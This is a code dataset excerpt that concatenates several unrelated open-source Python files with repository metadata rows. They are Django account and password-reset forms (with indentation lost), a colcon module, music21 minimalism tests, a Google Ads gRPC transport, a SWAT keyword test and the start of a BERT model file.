super(SignupForm, self).__init__(*args, **kwargs)
if REQUIRED_EMAIL or EMAIL_VERIFICATION or EMAIL_AUTHENTICATION:
self.fields["email"].label = ugettext("Email")
self.fields["email"].required = True
else:
self.fields["email"].label = ugettext("Email (optional)")
self.fields["email"].required = False
def clean_username(self):
if not alnum_re.search(self.cleaned_data["username"]):
raise forms.ValidationError(_("Usernames can only contain letters, numbers and underscores."))
try:
User.objects.get(username__iexact=self.cleaned_data["username"])
except User.DoesNotExist:
return self.cleaned_data["username"]
raise forms.ValidationError(_("This username is already taken. Please choose another."))
def clean_email(self):
value = self.cleaned_data["email"]
if UNIQUE_EMAIL or EMAIL_AUTHENTICATION:
try:
User.objects.get(email__iexact=value)
except User.DoesNotExist:
return value
raise forms.ValidationError(_("A user is registered with this email address."))
return value
def clean(self):
if "password1" in self.cleaned_data and "password2" in self.cleaned_data:
if len(self.cleaned_data["password1"]) < PASSWORD_MIN_LENGTH or len(self.cleaned_data["password1"]) > PASSWORD_MAX_LENGTH:
raise forms.ValidationError(_("Password should be in %(min)d to %(max)d" % {"min": PASSWORD_MIN_LENGTH, "max":PASSWORD_MAX_LENGTH}))
if len(self.cleaned_data["password2"]) < PASSWORD_MIN_LENGTH or len(self.cleaned_data["password2"]) > PASSWORD_MAX_LENGTH:
raise forms.ValidationError(_("Password should be in %(min)d to %(max)d" % {"min": PASSWORD_MIN_LENGTH, "max":PASSWORD_MAX_LENGTH}))
if self.cleaned_data["password1"] != self.cleaned_data["password2"]:
raise forms.ValidationError(_("You must type the same password each time."))
return self.cleaned_data
def create_user(self, username=None, commit=True):
user = User()
if username is None:
raise NotImplementedError("SignupForm.create_user does not handle "
"username=None case. You must override this method.")
user.username = username
user.email = self.cleaned_data["email"].strip().lower()
password = self.cleaned_data.get("password1")
if password:
user.set_password(password)
else:
user.set_unusable_password()
if commit:
user.save()
return user
def login(self, request, user):
# nasty hack to get get_user to work in Django
user.backend = "django.contrib.auth.backends.ModelBackend"
perform_login(request, user)
def save(self, request=None):
# don't assume a username is available. it is a common removal if
# site developer wants to use email authentication.
username = self.cleaned_data.get("username")
email = self.cleaned_data["email"]
if self.cleaned_data["confirmation_key"]:
from friends.models import JoinInvitation # @@@ temporary fix for issue 93
try:
join_invitation = JoinInvitation.objects.get(confirmation_key=self.cleaned_data["confirmation_key"])
confirmed = True
except JoinInvitation.DoesNotExist:
confirmed = False
else:
confirmed = False
# @@@ clean up some of the repetition below -- DRY!
if confirmed:
if email == join_invitation.contact.email:
new_user = self.create_user(username)
join_invitation.accept(new_user) # should go before creation of EmailAddress below
if request:
messages.add_message(request, messages.INFO,
ugettext(u"Your email address has already been verified")
)
# already verified so can just create
EmailAddress(user=new_user, email=email, verified=True, primary=True).save()
else:
new_user = self.create_user(username)
join_invitation.accept(new_user) # should go before creation of EmailAddress below
if email:
if request:
messages.add_message(request, messages.INFO,
ugettext(u"Confirmation email sent to %(email)s") % {
"email": email,
}
)
EmailAddress.objects.add_email(new_user, email)
else:
new_user = self.create_user(username)
if email:
if request and not EMAIL_VERIFICATION:
messages.add_message(request, messages.INFO,
ugettext(u"Confirmation email sent to %(email)s") % {
"email": email,
}
)
EmailAddress.objects.add_email(new_user, email)
if EMAIL_VERIFICATION:
new_user.is_active = False
new_user.save()
self.after_signup(new_user)
return new_user
def after_signup(self, user, **kwargs):
"""
An extension point for subclasses.
"""
pass
class UserForm(forms.Form):
def __init__(self, user=None, *args, **kwargs):
self.user = user
super(UserForm, self).__init__(*args, **kwargs)
class AccountForm(UserForm):
def __init__(self, *args, **kwargs):
super(AccountForm, self).__init__(*args, **kwargs)
try:
self.account = Account.objects.get(user=self.user)
except Account.DoesNotExist:
self.account = Account(user=self.user)
class AddEmailForm(UserForm):
email = forms.EmailField(
label=_("Email"),
required=True,
widget=forms.TextInput(attrs={"size": "30"})
)
def clean_email(self):
value = self.cleaned_data["email"]
errors = {
"this_account": _("This email address already associated with this account."),
"different_account": _("This email address already associated with another account."),
}
if UNIQUE_EMAIL:
try:
email = EmailAddress.objects.get(email__iexact=value)
except EmailAddress.DoesNotExist:
return value
if email.user == self.user:
raise forms.ValidationError(errors["this_account"])
raise forms.ValidationError(errors["different_account"])
else:
try:
EmailAddress.objects.get(user=self.user, email__iexact=value)
except EmailAddress.DoesNotExist:
return value
raise forms.ValidationError(errors["this_account"])
def save(self):
return EmailAddress.objects.add_email(self.user, self.cleaned_data["email"])
class ChangePasswordForm(UserForm):
oldpassword = forms.CharField(
label=_("Current Password"),
widget=forms.PasswordInput(render_value=False)
)
password1 = forms.CharField(
label=_("New Password"),
widget=forms.PasswordInput(render_value=False)
)
password2 = forms.CharField(
label=_("New Password (again)"),
widget=forms.PasswordInput(render_value=False)
)
def clean_oldpassword(self):
if not self.user.check_password(self.cleaned_data.get("oldpassword")):
raise forms.ValidationError(_("Please type your current password."))
return self.cleaned_data["oldpassword"]
def clean_password2(self):
if "password1" in self.cleaned_data and "password2" in self.cleaned_data:
if self.cleaned_data["password1"] != self.cleaned_data["password2"]:
raise forms.ValidationError(_("You must type the same password each time."))
return self.cleaned_data["password2"]
def save(self):
change_password(self.user, self.cleaned_data["password1"])
class SetPasswordForm(UserForm):
password1 = forms.CharField(
label=_("Password"),
widget=forms.PasswordInput(render_value=False)
)
password2 = forms.CharField(
label=_("Password (again)"),
widget=forms.PasswordInput(render_value=False)
)
def clean_password2(self):
if "password1" in self.cleaned_data and "password2" in self.cleaned_data:
if self.cleaned_data["password1"] != self.cleaned_data["password2"]:
raise forms.ValidationError(_("You must type the same password each time."))
return self.cleaned_data["password2"]
def save(self):
self.user.set_password(self.cleaned_data["password1"])
self.user.save()
class ResetPasswordForm(forms.Form):
email = forms.EmailField(
label=_("Email"),
required=True,
widget=forms.TextInput(attrs={"size": "30"})
)
def clean_email(self):
if EmailAddress.objects.filter(email__iexact=self.cleaned_data["email"], verified=True).count() == 0:
raise forms.ValidationError(_("Email address not verified for any user account"))
return self.cleaned_data["email"]
def save(self, **kwargs):
email = self.cleaned_data["email"]
token_generator = kwargs.get("token_generator", default_token_generator)
for user in User.objects.filter(email__iexact=email):
temp_key = token_generator.make_token(user)
# save it to the password reset model
password_reset = PasswordReset(user=user, temp_key=temp_key)
password_reset.save()
current_site = Site.objects.get_current()
domain = unicode(current_site.domain)
# send the password reset email
subject = _("Password reset email sent")
message = render_to_string("account/password_reset_key_message.txt", {
"user": user,
"uid": int_to_base36(user.id),
"temp_key": temp_key,
"domain": domain,
})
send_mail(subject, message, settings.DEFAULT_FROM_EMAIL, [user.email])
return self.cleaned_data["email"]
class ResetPasswordKeyForm(forms.Form):
password1 = forms.CharField(
label=_("New Password"),
widget=forms.PasswordInput(render_value=False)
)
password2 = forms.CharField(
label=_("New Password (again)"),
widget=forms.PasswordInput(render_value=False)
)
def __init__(self, *args, **kwargs):
self.user = kwargs.pop("user", None)
self.temp_key = kwargs.pop("temp_key", None)
super(ResetPasswordKeyForm, self).__init__(*args, **kwargs)
def clean_password2(self):
if "password1" in self.cleaned_data and "password2" in self.cleaned_data:
if self.cleaned_data["password1"] != self.cleaned_data["password2"]:
raise forms.ValidationError(_("You must type the same password each time."))
return self.cleaned_data["password2"]
def save(self):
# set the new user password
user = self.user
user.set_password(self.cleaned_data["password1"])
user.save()
# mark password reset object as reset
PasswordReset.objects.filter(temp_key=self.temp_key).update(reset=True)
class ChangeTimezoneForm(AccountForm):
timezone = TimeZoneField(label=_("Timezone"), required=True)
def __init__(self, *args, **kwargs):
super(ChangeTimezoneForm, self).__init__(*args, **kwargs)
self.initial.update({"timezone": self.account.timezone})
def save(self):
self.account.timezone = self.cleaned_data["timezone"]
self.account.save()
class ChangeLanguageForm(AccountForm):
language = forms.ChoiceField(
label=_("Language"),
required=True,
choices=settings.LANGUAGES
)
def __init__(self, *args, **kwargs):
super(ChangeLanguageForm, self).__init__(*args, **kwargs)
self.initial.update({"language": self.account.language})
def save(self):
self.account.language = self.cleaned_data["language"]
self.account.save()
| 37.044643 | 148 | 0.62509 |
795af4d864995ffc8fae39868fb4eb2dfaeab3d0 | 332 | py | Python | colcon_export_command/xml/models/__init__.py | maciejmatuszak/colcon-export-command | a7747996cbff25d8611306a9c1987cea3966271e | [
"Apache-2.0"
] | null | null | null | colcon_export_command/xml/models/__init__.py | maciejmatuszak/colcon-export-command | a7747996cbff25d8611306a9c1987cea3966271e | [
"Apache-2.0"
] | null | null | null | colcon_export_command/xml/models/__init__.py | maciejmatuszak/colcon-export-command | a7747996cbff25d8611306a9c1987cea3966271e | [
"Apache-2.0"
] | null | null | null | from colcon_export_command.xml.models.project import (
AdditionalGenerationEnvironment,
Component,
Configuration,
Configurations,
Env,
Envs,
Project,
)
__all__ = [
"AdditionalGenerationEnvironment",
"Component",
"Configuration",
"Configurations",
"Env",
"Envs",
"Project",
]
| 16.6 | 54 | 0.650602 |
795af779c8632aff242bcdccdb44123e7a86ed56 | 14,133 | py | Python | tests/test_minimalism.py | georgesdimitrov/arvo | 86d33afc3f45d1f2e6f22aded8c2e2b12bc5db7d | [
"MIT"
] | 11 | 2021-02-24T20:05:24.000Z | 2022-03-13T14:27:04.000Z | tests/test_minimalism.py | georgesdimitrov/arvo | 86d33afc3f45d1f2e6f22aded8c2e2b12bc5db7d | [
"MIT"
] | null | null | null | tests/test_minimalism.py | georgesdimitrov/arvo | 86d33afc3f45d1f2e6f22aded8c2e2b12bc5db7d | [
"MIT"
] | 3 | 2021-09-24T02:26:16.000Z | 2022-03-22T12:34:36.000Z | import pytest
from music21 import converter
from arvo import minimalism
from arvo import sequences
@pytest.fixture
def example_stream():
s = converter.parse("tinyNotation: C D E F G A B c d e f g")
return s
# Additive Process Tests
def test_additive_process(example_stream):
result = minimalism.additive_process(example_stream)
intended_result = converter.parse(
"""tinyNotation:
C
C D
C D E
C D E F
C D E F G
C D E F G A
C D E F G A B
C D E F G A B c
C D E F G A B c d
C D E F G A B c d e
C D E F G A B c d e f
C D E F G A B c d e f g
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
@pytest.mark.parametrize(
"direction,intended_result",
[
(
minimalism.Direction.BACKWARD,
converter.parse(
"""tinyNotation:
g
f g
e f g
d e f g
c d e f g
B c d e f g
A B c d e f g
G A B c d e f g
F G A B c d e f g
E F G A B c d e f g
D E F G A B c d e f g
C D E F G A B c d e f g
"""
),
),
(
minimalism.Direction.INWARD,
converter.parse(
"""tinyNotation:
C g
C D f g
C D E e f g
C D E F d e f g
C D E F G c d e f g
C D E F G A B c d e f g
"""
),
),
(
minimalism.Direction.OUTWARD,
converter.parse(
"""tinyNotation:
A B
G A B c
F G A B c d
E F G A B c d e
D E F G A B c d e f
C D E F G A B c d e f g
"""
),
),
],
)
def test_additive_process_direction(example_stream, direction, intended_result):
result = minimalism.additive_process(example_stream, direction=direction)
assert list(result.flat.notes) == list(intended_result.flat.notes)
def test_additive_process_step_value_int(example_stream):
result = minimalism.additive_process(example_stream, step_value=2)
intended_result = converter.parse(
"""tinyNotation:
C D
C D E F
C D E F G A
C D E F G A B c
C D E F G A B c d e
C D E F G A B c d e f g
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
def test_additive_process_step_value_sequence(example_stream):
result = minimalism.additive_process(example_stream, step_value=[1, 2, 3])
intended_result = converter.parse(
"""tinyNotation:
C
C D E
C D E F G A
C D E F G A B
C D E F G A B c d
C D E F G A B c d e f g
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
def test_additive_process_step_value_sequence_absolute(example_stream):
result = minimalism.additive_process(
example_stream,
step_value=sequences.PRIMES,
step_mode=minimalism.StepMode.ABSOLUTE,
)
intended_result = converter.parse(
"""tinyNotation:
C D
C D E
C D E F G
C D E F G A B
C D E F G A B c d e f
C D E F G A B c d e f g
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
def test_additive_process_step_value_sequence_absolute_infinite_loop(example_stream):
result = minimalism.additive_process(
example_stream, step_value=[1, 2, 3], step_mode=minimalism.StepMode.ABSOLUTE
)
intended_result = converter.parse(
"""tinyNotation:
C
C D
C D E
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
def test_additive_process_repetitions_int(example_stream):
result = minimalism.additive_process(example_stream, repetitions=2)
intended_result = converter.parse(
"""tinyNotation:
C
C
C D
C D
C D E
C D E
C D E F
C D E F
C D E F G
C D E F G
C D E F G A
C D E F G A
C D E F G A B
C D E F G A B
C D E F G A B c
C D E F G A B c
C D E F G A B c d
C D E F G A B c d
C D E F G A B c d e
C D E F G A B c d e
C D E F G A B c d e f
C D E F G A B c d e f
C D E F G A B c d e f g
C D E F G A B c d e f g
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
def test_additive_process_repetitions_sequence(example_stream):
result = minimalism.additive_process(example_stream, repetitions=[1, 2, 3])
intended_result = converter.parse(
"""tinyNotation:
C
C D
C D
C D E
C D E
C D E
C D E F
C D E F G
C D E F G
C D E F G A
C D E F G A
C D E F G A
C D E F G A B
C D E F G A B c
C D E F G A B c
C D E F G A B c d
C D E F G A B c d
C D E F G A B c d
C D E F G A B c d e
C D E F G A B c d e f
C D E F G A B c d e f
C D E F G A B c d e f g
C D E F G A B c d e f g
C D E F G A B c d e f g
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
def test_additive_process_iterations_start(example_stream):
result = minimalism.additive_process(example_stream, iterations_start=3)
intended_result = converter.parse(
"""tinyNotation:
C D E
C D E F
C D E F G
C D E F G A
C D E F G A B
C D E F G A B c
C D E F G A B c d
C D E F G A B c d e
C D E F G A B c d e f
C D E F G A B c d e f g
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
def test_additive_process_iterations_end(example_stream):
result = minimalism.additive_process(example_stream, iterations_end=8)
intended_result = converter.parse(
"""tinyNotation:
C
C D
C D E
C D E F
C D E F G
C D E F G A
C D E F G A B
C D E F G A B c
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
def test_additive_process_nonlinear(example_stream):
result = minimalism.additive_process(
example_stream,
step_value=sequences.kolakoski(),
step_mode=minimalism.StepMode.ABSOLUTE,
iterations_end=8,
)
intended_result = converter.parse(
"""tinyNotation:
C
C D
C D
C
C
C D
C
C D
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
# Subtractive Process Tests
def test_subtractive_process(example_stream):
result = minimalism.subtractive_process(example_stream)
intended_result = converter.parse(
"""tinyNotation:
C D E F G A B c d e f g
D E F G A B c d e f g
E F G A B c d e f g
F G A B c d e f g
G A B c d e f g
A B c d e f g
B c d e f g
c d e f g
d e f g
e f g
f g
g
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
@pytest.mark.parametrize(
"direction,intended_result",
[
(
minimalism.Direction.BACKWARD,
converter.parse(
"""tinyNotation:
C D E F G A B c d e f g
C D E F G A B c d e f
C D E F G A B c d e
C D E F G A B c d
C D E F G A B c
C D E F G A B
C D E F G A
C D E F G
C D E F
C D E
C D
C
"""
),
),
(
minimalism.Direction.INWARD,
converter.parse(
"""tinyNotation:
C D E F G A B c d e f g
D E F G A B c d e f
E F G A B c d e
F G A B c d
G A B c
A B
"""
),
),
(
minimalism.Direction.OUTWARD,
converter.parse(
"""tinyNotation:
C D E F G A B c d e f g
C D E F G c d e f g
C D E F d e f g
C D E e f g
C D f g
C g
"""
),
),
],
)
def test_subtractive_process_direction(example_stream, direction, intended_result):
result = minimalism.subtractive_process(example_stream, direction=direction)
assert list(result.flat.notes) == list(intended_result.flat.notes)
def test_subtractive_process_step_value_int(example_stream):
result = minimalism.subtractive_process(example_stream, step_value=2)
intended_result = converter.parse(
"""tinyNotation:
C D E F G A B c d e f g
E F G A B c d e f g
G A B c d e f g
B c d e f g
d e f g
f g
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
def test_subtractive_process_step_value_sequence(example_stream):
result = minimalism.subtractive_process(example_stream, step_value=[1, 2, 3])
intended_result = converter.parse(
"""tinyNotation:
C D E F G A B c d e f g
D E F G A B c d e f g
F G A B c d e f g
B c d e f g
c d e f g
e f g
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
def test_subtractive_process_step_value_sequence_absolute(example_stream):
result = minimalism.subtractive_process(
example_stream,
step_value=sequences.PRIMES,
step_mode=minimalism.StepMode.ABSOLUTE,
)
intended_result = converter.parse(
"""tinyNotation:
C D E F G A B c d e f g
E F G A B c d e f g
F G A B c d e f g
A B c d e f g
c d e f g
g
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
def test_subtractive_process_step_value_sequence_absolute_infinite_loop(example_stream):
result = minimalism.subtractive_process(
example_stream, step_value=[1, 2, 3], step_mode=minimalism.StepMode.ABSOLUTE
)
intended_result = converter.parse(
"""tinyNotation:
C D E F G A B c d e f g
D E F G A B c d e f g
E F G A B c d e f g
F G A B c d e f g
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
def test_subtractive_process_repetitions_int(example_stream):
result = minimalism.subtractive_process(example_stream, repetitions=2)
intended_result = converter.parse(
"""tinyNotation:
C D E F G A B c d e f g
C D E F G A B c d e f g
D E F G A B c d e f g
D E F G A B c d e f g
E F G A B c d e f g
E F G A B c d e f g
F G A B c d e f g
F G A B c d e f g
G A B c d e f g
G A B c d e f g
A B c d e f g
A B c d e f g
B c d e f g
B c d e f g
c d e f g
c d e f g
d e f g
d e f g
e f g
e f g
f g
f g
g
g
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
def test_subtractive_process_repetitions_sequence(example_stream):
result = minimalism.subtractive_process(example_stream, repetitions=[1, 2, 3])
intended_result = converter.parse(
"""tinyNotation:
C D E F G A B c d e f g
D E F G A B c d e f g
D E F G A B c d e f g
E F G A B c d e f g
E F G A B c d e f g
E F G A B c d e f g
F G A B c d e f g
G A B c d e f g
G A B c d e f g
A B c d e f g
A B c d e f g
A B c d e f g
B c d e f g
c d e f g
c d e f g
d e f g
d e f g
d e f g
e f g
f g
f g
g
g
g
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
def test_subtractive_process_iterations_start(example_stream):
result = minimalism.subtractive_process(example_stream, iterations_start=3)
intended_result = converter.parse(
"""tinyNotation:
F G A B c d e f g
G A B c d e f g
A B c d e f g
B c d e f g
c d e f g
d e f g
e f g
f g
g
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
def test_subtractive_process_iterations_end(example_stream):
result = minimalism.subtractive_process(example_stream, iterations_end=8)
intended_result = converter.parse(
"""tinyNotation:
C D E F G A B c d e f g
D E F G A B c d e f g
E F G A B c d e f g
F G A B c d e f g
G A B c d e f g
A B c d e f g
B c d e f g
c d e f g
d e f g
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
def test_subtractive_process_nonlinear(example_stream):
result = minimalism.subtractive_process(
example_stream,
step_value=sequences.kolakoski(),
step_mode=minimalism.StepMode.ABSOLUTE,
iterations_end=8,
)
intended_result = converter.parse(
"""tinyNotation:
C D E F G A B c d e f g
D E F G A B c d e f g
E F G A B c d e f g
E F G A B c d e f g
D E F G A B c d e f g
D E F G A B c d e f g
E F G A B c d e f g
D E F G A B c d e f g
E F G A B c d e f g
"""
)
assert list(result.flat.notes) == list(intended_result.flat.notes)
| 25.93211 | 88 | 0.51355 |
795af7835d20a0e7ac3e72b1c399b52b9f7a1cf2 | 10,122 | py | Python | google/ads/googleads/v7/googleads-py/google/ads/googleads/v7/services/services/life_event_service/transports/grpc.py | googleapis/googleapis-gen | d84824c78563d59b0e58d5664bfaa430e9ad7e7a | [
"Apache-2.0"
] | 7 | 2021-02-21T10:39:41.000Z | 2021-12-07T07:31:28.000Z | google/ads/googleads/v7/googleads-py/google/ads/googleads/v7/services/services/life_event_service/transports/grpc.py | googleapis/googleapis-gen | d84824c78563d59b0e58d5664bfaa430e9ad7e7a | [
"Apache-2.0"
] | 6 | 2021-02-02T23:46:11.000Z | 2021-11-15T01:46:02.000Z | google/ads/googleads/v7/googleads-py/google/ads/googleads/v7/services/services/life_event_service/transports/grpc.py | googleapis/googleapis-gen | d84824c78563d59b0e58d5664bfaa430e9ad7e7a | [
"Apache-2.0"
] | 4 | 2021-01-28T23:25:45.000Z | 2021-08-30T01:55:16.000Z | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Callable, Dict, Optional, Sequence, Tuple
from google.api_core import grpc_helpers # type: ignore
from google.api_core import gapic_v1 # type: ignore
import google.auth # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import grpc # type: ignore
from google.ads.googleads.v7.resources.types import life_event
from google.ads.googleads.v7.services.types import life_event_service
from .base import LifeEventServiceTransport, DEFAULT_CLIENT_INFO
class LifeEventServiceGrpcTransport(LifeEventServiceTransport):
"""gRPC backend transport for LifeEventService.
Service to fetch Google Ads Life Events.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
def __init__(self, *,
host: str = 'googleads.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: str = None,
scopes: Sequence[str] = None,
channel: grpc.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional(Sequence[str])): A list of scopes. This argument is
ignored if ``channel`` is provided.
channel (Optional[grpc.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
``client_cert_source`` or application default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for grpc channel. It is ignored if ``channel`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
self._ssl_channel_credentials = ssl_channel_credentials
if channel:
# Sanity check: Ensure that channel and credentials are not both
# provided.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
elif api_mtls_endpoint:
warnings.warn("api_mtls_endpoint and client_cert_source are deprecated", DeprecationWarning)
host = api_mtls_endpoint if ":" in api_mtls_endpoint else api_mtls_endpoint + ":443"
if credentials is None:
credentials, _ = google.auth.default(scopes=self.AUTH_SCOPES, quota_project_id=quota_project_id)
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
ssl_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
ssl_credentials = SslCredentials().ssl_credentials
# create a new channel. The provided one is ignored.
self._grpc_channel = type(self).create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
ssl_credentials=ssl_credentials,
scopes=scopes or self.AUTH_SCOPES,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
self._ssl_channel_credentials = ssl_credentials
else:
host = host if ":" in host else host + ":443"
if credentials is None:
credentials, _ = google.auth.default(scopes=self.AUTH_SCOPES)
# create a new channel. The provided one is ignored.
self._grpc_channel = type(self).create_channel(
host,
credentials=credentials,
ssl_credentials=ssl_channel_credentials,
scopes=self.AUTH_SCOPES,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
self._stubs = {} # type: Dict[str, Callable]
# Run the base constructor.
super().__init__(
host=host,
credentials=credentials,
client_info=client_info,
)
@classmethod
def create_channel(cls,
host: str = 'googleads.googleapis.com',
credentials: ga_credentials.Credentials = None,
scopes: Optional[Sequence[str]] = None,
**kwargs) -> grpc.Channel:
"""Create and return a gRPC channel object.
Args:
address (Optionsl[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
grpc.Channel: A gRPC channel object.
"""
return grpc_helpers.create_channel(
host,
credentials=credentials,
scopes=scopes or cls.AUTH_SCOPES,
**kwargs
)
def close(self):
self.grpc_channel.close()
@property
def grpc_channel(self) -> grpc.Channel:
"""Return the channel designed to connect to this service.
"""
return self._grpc_channel
@property
def get_life_event(self) -> Callable[
[life_event_service.GetLifeEventRequest],
life_event.LifeEvent]:
r"""Return a callable for the get life event method over gRPC.
Returns the requested life event in full detail.
Returns:
Callable[[~.GetLifeEventRequest],
~.LifeEvent]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'get_life_event' not in self._stubs:
self._stubs['get_life_event'] = self.grpc_channel.unary_unary(
'/google.ads.googleads.v7.services.LifeEventService/GetLifeEvent',
request_serializer=life_event_service.GetLifeEventRequest.serialize,
response_deserializer=life_event.LifeEvent.deserialize,
)
return self._stubs['get_life_event']
__all__ = (
'LifeEventServiceGrpcTransport',
)
| 43.44206 | 112 | 0.621814 |
795af80a5377c419f64b04f93bfab91e618a5afc | 1,177 | py | Python | swat/tests/test_keyword.py | bosout/python-swat | 36c1a1e301fb103ae90d11a373fb3f065be321fd | [
"Apache-2.0"
] | 133 | 2016-09-30T18:53:10.000Z | 2022-03-25T20:54:06.000Z | swat/tests/test_keyword.py | bosout/python-swat | 36c1a1e301fb103ae90d11a373fb3f065be321fd | [
"Apache-2.0"
] | 113 | 2017-01-16T21:01:23.000Z | 2022-03-29T11:02:21.000Z | swat/tests/test_keyword.py | bosout/python-swat | 36c1a1e301fb103ae90d11a373fb3f065be321fd | [
"Apache-2.0"
] | 65 | 2016-09-29T15:23:49.000Z | 2022-03-04T12:45:43.000Z | #!/usr/bin/env python
# encoding: utf-8
#
# Copyright SAS Institute
#
# Licensed under the Apache License, Version 2.0 (the License);
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import swat.utils.testing as tm
import unittest
from swat.utils.keyword import dekeywordify, keywordify
class TestKeyword(tm.TestCase):
def test_dekeywordify(self):
self.assertEqual(dekeywordify('from'), 'from_')
self.assertEqual(dekeywordify('to'), 'to')
self.assertEqual(dekeywordify(10), 10)
def test_keywordify(self):
self.assertEqual(keywordify('from_'), 'from')
self.assertEqual(keywordify('to'), 'to')
self.assertEqual(keywordify(10), 10)
if __name__ == '__main__':
tm.runtests()
| 30.179487 | 75 | 0.715378 |
795af94a0a4d10357b715e149e9240a9898718c4 | 76,107 | py | Python | src/transformers/modeling_bert.py | h2rlet/transformers | 6f8a01a2ad709aca8e385108e7f946577c1df6bc | [
"Apache-2.0"
] | null | null | null | src/transformers/modeling_bert.py | h2rlet/transformers | 6f8a01a2ad709aca8e385108e7f946577c1df6bc | [
"Apache-2.0"
] | null | null | null | src/transformers/modeling_bert.py | h2rlet/transformers | 6f8a01a2ad709aca8e385108e7f946577c1df6bc | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""PyTorch BERT model. """
import logging
import math
import os
import warnings
import torch
import torch.utils.checkpoint
from torch import nn
from torch.nn import CrossEntropyLoss, MSELoss
from .activations import gelu, gelu_new, swish
from .configuration_bert import BertConfig
from .file_utils import add_start_docstrings, add_start_docstrings_to_callable
from .modeling_utils import PreTrainedModel, find_pruneable_heads_and_indices, prune_linear_layer
logger = logging.getLogger(__name__)
BERT_PRETRAINED_MODEL_ARCHIVE_LIST = [
"bert-base-uncased",
"bert-large-uncased",
"bert-base-cased",
"bert-large-cased",
